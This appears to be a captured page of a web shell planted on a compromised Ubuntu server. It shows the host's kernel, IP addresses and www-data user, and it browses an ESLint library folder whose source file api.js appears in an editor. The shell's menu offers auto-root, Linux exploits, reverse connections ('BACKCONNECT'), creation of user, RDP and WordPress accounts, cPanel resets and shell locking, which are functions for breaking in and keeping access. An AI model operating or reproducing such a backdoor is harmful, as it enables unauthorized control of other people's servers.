Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
eslint /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
cli-engine
[ DIR ]
dr-xr-xr-x
config
[ DIR ]
dr-xr-xr-x
eslint
[ DIR ]
dr-xr-xr-x
linter
[ DIR ]
dr-xr-xr-x
rule-tester
[ DIR ]
dr-xr-xr-x
rules
[ DIR ]
dr-xr-xr-x
shared
[ DIR ]
dr-xr-xr-x
source-code
[ DIR ]
dr-xr-xr-x
api.js
1.72
KB
-rw-rw-rw-
cli.js
15.06
KB
-rw-rw-rw-
options.js
13.87
KB
-rw-rw-rw-
unsupported-api.js
981
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : api.js
/** * @fileoverview Expose out ESLint and CLI to require. * @author Ian Christian Myers */ "use strict"; //----------------------------------------------------------------------------- // Requirements //----------------------------------------------------------------------------- const { ESLint, FlatESLint } = require("./eslint"); const { shouldUseFlatConfig } = require("./eslint/flat-eslint"); const { Linter } = require("./linter"); const { RuleTester } = require("./rule-tester"); const { SourceCode } = require("./source-code"); //----------------------------------------------------------------------------- // Functions //----------------------------------------------------------------------------- /** * Loads the correct ESLint constructor given the options. * @param {Object} [options] The options object * @param {boolean} [options.useFlatConfig] Whether or not to use a flat config * @param {string} [options.cwd] The current working directory * @returns {Promise<ESLint|LegacyESLint>} The ESLint constructor */ async function loadESLint({ useFlatConfig, cwd = process.cwd() } = {}) { /* * Note: The v9.x version of this function doesn't have a cwd option * because it's not used. It's only used in the v8.x version of this * function. */ const shouldESLintUseFlatConfig = typeof useFlatConfig === "boolean" ? useFlatConfig : await shouldUseFlatConfig({ cwd }); return shouldESLintUseFlatConfig ? FlatESLint : ESLint; } //----------------------------------------------------------------------------- // Exports //----------------------------------------------------------------------------- module.exports = { Linter, loadESLint, ESLint, RuleTester, SourceCode };
Close